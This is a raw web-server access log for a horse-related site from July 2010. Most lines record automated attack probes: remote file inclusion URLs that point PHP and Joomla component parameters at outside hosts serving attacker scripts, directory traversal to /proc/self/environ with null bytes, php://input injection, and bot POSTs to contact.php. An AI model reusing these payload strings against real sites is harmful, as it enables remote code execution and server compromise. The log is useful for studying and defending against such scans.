217.195.185.200 - - [23/Jul/2010:22:09:24 -0700] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.herzfeuer.eu/artwerk/sh/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
217.195.185.200 - - [23/Jul/2010:22:09:26 -0700] "GET /logs/access_100403.log%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.herzfeuer.eu/artwerk/sh/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
122.155.9.169 - - [23/Jul/2010:22:12:25 -0700] "GET /logs/access_100612.logphphtml.php?htmlclass_path=http://oklsdioj.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
122.155.9.169 - - [23/Jul/2010:22:12:25 -0700] "GET /phphtml.php?htmlclass_path=http://oklsdioj.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
122.155.9.169 - - [23/Jul/2010:22:12:26 -0700] "GET /logs/phphtml.php?htmlclass_path=http://oklsdioj.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:22:12:52 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.britak.co.ke//images/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:22:12:52 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.britak.co.ke//images/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
74.124.198.168 - - [23/Jul/2010:22:16:58 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://livetest.foregroundsecurity.com//Iivetest/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
74.124.198.168 - - [23/Jul/2010:22:16:58 -0700] "GET /logs/access_100612.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://livetest.foregroundsecurity.com//Iivetest/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
74.124.198.168 - - [23/Jul/2010:22:16:58 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://livetest.foregroundsecurity.com//Iivetest/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
74.124.198.168 - - [23/Jul/2010:22:17:45 -0700] "GET /logs/access_100710.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://livetest.foregroundsecurity.com//Iivetest/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
89.252.20.60 - - [23/Jul/2010:22:18:28 -0700] "GET /logs/access_100327.log HTTP/1.0" 200 851968 "http://kachay.ks.ua/index.php?do=cat&category=videouroki" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.getyourselfahorse.com"
74.124.198.168 - - [23/Jul/2010:22:18:42 -0700] "GET /logs/access_100612.log//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://livetest.foregroundsecurity.com//Iivetest/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
74.124.198.168 - - [23/Jul/2010:22:18:51 -0700] "GET /logs/access.log//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://livetest.foregroundsecurity.com//Iivetest/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
92.53.113.3 - - [23/Jul/2010:22:27:06 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "getyourselfahorse.com"
92.53.113.3 - - [23/Jul/2010:22:27:06 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "getyourselfahorse.com"
92.53.113.3 - - [23/Jul/2010:22:27:06 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "getyourselfahorse.com"
92.53.113.3 - - [23/Jul/2010:22:27:06 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "getyourselfahorse.com"
92.53.113.3 - - [23/Jul/2010:22:27:06 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "getyourselfahorse.com"
92.53.113.3 - - [23/Jul/2010:22:27:06 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "getyourselfahorse.com"
92.53.113.3 - - [23/Jul/2010:22:27:06 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "getyourselfahorse.com"
92.53.113.3 - - [23/Jul/2010:22:27:06 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "getyourselfahorse.com"
92.53.113.3 - - [23/Jul/2010:22:27:06 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "getyourselfahorse.com"
92.53.113.3 - - [23/Jul/2010:22:27:06 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "getyourselfahorse.com"
92.53.113.3 - - [23/Jul/2010:22:27:06 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "getyourselfahorse.com"
92.53.113.3 - - [23/Jul/2010:22:27:06 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "getyourselfahorse.com"
74.124.198.168 - - [23/Jul/2010:22:29:27 -0700] "GET /logs/access_100710.log//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://livetest.foregroundsecurity.com//Iivetest/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:22:33:24 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:22:33:24 -0700] "GET /logs/access_100417.log//admin/spaw/spaw_control.class.php?spaw_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:22:33:24 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:22:33:33 -0700] "GET /logs/access_100417.log//admin/spaw/spaw_control.class.php?spaw_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:22:33:33 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:22:33:33 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:22:41:43 -0700] "GET /logs/access_100320.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.britak.co.ke//images/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:22:41:44 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.britak.co.ke//images/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:22:41:44 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.britak.co.ke//images/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:22:43:23 -0700] "GET /logs/access_100710.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:22:43:23 -0700] "GET /index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:22:43:24 -0700] "GET /logs//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
72.55.153.180 - - [23/Jul/2010:22:43:30 -0700] "GET /logs/access_100710.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [23/Jul/2010:22:43:30 -0700] "GET /index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [23/Jul/2010:22:43:30 -0700] "GET /logs//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:22:43:30 -0700] "GET /index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
72.55.153.180 - - [23/Jul/2010:22:43:37 -0700] "GET /logs/access_100710.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [23/Jul/2010:22:43:37 -0700] "GET /index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [23/Jul/2010:22:43:37 -0700] "GET /logs//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [23/Jul/2010:22:43:40 -0700] "GET /index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [23/Jul/2010:22:43:40 -0700] "GET /index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:22:43:41 -0700] "GET /index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:22:43:41 -0700] "GET /index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
72.55.153.180 - - [23/Jul/2010:22:43:42 -0700] "GET /index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [23/Jul/2010:22:43:47 -0700] "GET /logs/access_100710.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [23/Jul/2010:22:43:47 -0700] "GET /index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [23/Jul/2010:22:43:47 -0700] "GET /logs//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:22:43:48 -0700] "GET /logs/access_100612.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:22:43:57 -0700] "GET /logs/access_100710.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:22:43:57 -0700] "GET /index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:22:43:58 -0700] "GET /logs//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:22:44:03 -0700] "GET /logs/access_100710.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:22:44:03 -0700] "GET /index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:22:44:03 -0700] "GET /logs//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
72.55.153.180 - - [23/Jul/2010:22:44:04 -0700] "GET /logs/access_100612.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [23/Jul/2010:22:44:07 -0700] "GET /logs/access_100612.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [23/Jul/2010:22:44:17 -0700] "GET /logs/access_100612.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:22:44:18 -0700] "GET /logs/access_100612.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:22:44:24 -0700] "GET /logs/access_100612.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:22:44:31 -0700] "GET /logs/access_100626.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.britak.co.ke//images/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
216.59.16.66 - - [23/Jul/2010:22:44:54 -0700] "GET /logs/access_100605.log/index.php?pilih=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
216.59.16.66 - - [23/Jul/2010:22:44:59 -0700] "GET /logs/access_100605.log/index.php?pilih=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
216.59.16.66 - - [23/Jul/2010:22:45:04 -0700] "POST /logs/access_100605.log/index.php?pilih=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:22:46:51 -0700] "GET /logs/access_100612.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:22:46:51 -0700] "GET /index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:22:46:51 -0700] "GET /logs//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:22:47:00 -0700] "GET /logs/access.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:22:47:02 -0700] "GET /logs/access_100612.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:22:47:03 -0700] "GET /index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:22:47:03 -0700] "GET /logs//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:22:47:04 -0700] "GET /logs/access_100612.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:22:47:04 -0700] "GET /index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:22:47:04 -0700] "GET /logs//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:22:47:13 -0700] "GET /logs/access.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:22:47:15 -0700] "GET /logs/access.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
87.229.26.132 - - [23/Jul/2010:22:47:50 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [23/Jul/2010:22:47:50 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [23/Jul/2010:22:47:50 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [23/Jul/2010:22:47:51 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [23/Jul/2010:22:47:51 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [23/Jul/2010:22:47:51 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [23/Jul/2010:22:47:51 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [23/Jul/2010:22:47:51 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [23/Jul/2010:22:47:51 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [23/Jul/2010:22:47:51 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [23/Jul/2010:22:47:51 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [23/Jul/2010:22:47:51 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [23/Jul/2010:22:47:51 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [23/Jul/2010:22:47:51 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [23/Jul/2010:22:47:51 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [23/Jul/2010:22:47:52 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [23/Jul/2010:22:47:52 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [23/Jul/2010:22:47:52 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [23/Jul/2010:22:47:52 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [23/Jul/2010:22:47:52 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [23/Jul/2010:22:47:52 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
194.19.251.181 - - [23/Jul/2010:22:48:11 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [23/Jul/2010:22:48:11 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [23/Jul/2010:22:48:11 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [23/Jul/2010:22:48:12 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [23/Jul/2010:22:48:12 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [23/Jul/2010:22:48:12 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [23/Jul/2010:22:48:12 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [23/Jul/2010:22:48:12 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [23/Jul/2010:22:48:12 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [23/Jul/2010:22:48:13 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [23/Jul/2010:22:48:15 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [23/Jul/2010:22:48:15 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
